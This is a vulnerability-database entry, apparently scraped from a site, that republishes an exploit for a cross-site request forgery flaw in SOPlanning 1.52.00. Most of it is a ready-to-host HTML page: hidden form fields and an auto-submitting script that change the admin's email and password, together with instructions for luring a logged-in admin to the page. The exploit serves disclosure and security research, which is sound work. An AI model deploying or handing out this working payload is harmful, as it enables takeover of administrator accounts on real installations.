Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtLiquidsky1337DAY-ID-39593
HistoryMay 03, 2024 - 12:00 a.m.

SOPlanning 1.52.00 Cross Site Request Forgery Vulnerability

2024-05-0300:00:00
liquidsky
0day.today
62
soplanning
csrf
vulnerability
xajax_server.php
account hijacking
remote attack
admin panel

7.4 High

AI Score

Confidence

Low

JSON
<!--
Exploit Title: SOPlanning v1.52.00 'xajax_server.php' CSRF (Account Takeover)
Application: SOPlanning
Version: 1.52.00
Exploit Author: Joseph McPeters (Liquidsky)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: Not yet assigned

Description: SOPlanning v1.52.00 is vulnerable to CSRF via 'xajax_server.php' a remote unautheticated attacker can hijack the admin account. The remote attacker can force the admins browser to make requests by sending them to an external page and update the admins password and email therefore taking over the admin panel.

Instructions: Host the exploit code included and have the admin visit the CSRF exploit page while logged in. It will be noticed that the password and email for the main admin have been changed to the specified email and password.

Liquidsky @ Specialized Security Services Inc. (S3) | Shout out to the team!
-->

<html>
  <body>
    <form action=https://fuzzlove.website/www/process/xajax_server.php method="POST">
      <input type="hidden" name="xajax" value="submitFormProfil" />
      <input type="hidden" name="xajaxr" value="" />
      <input type="hidden" name="xajaxargs[]" value="ADM" />
<!-- Update with attack email to change the admins email to yours -->
      <input type="hidden" name="xajaxargs[]" [email protected]<mailto:[email protected]> />
<!-- Update the following field to change the admins password to the password in the field -->
      <input type="hidden" name="xajaxargs[]" value="password" />
      <input type="hidden" name="xajaxargs[]" value="fr" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="hidden" name="xajaxargs[]" value="0" />
      <input type="hidden" name="xajaxargs[]" value="1" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

7.4 High

AI Score

Confidence

Low

JSON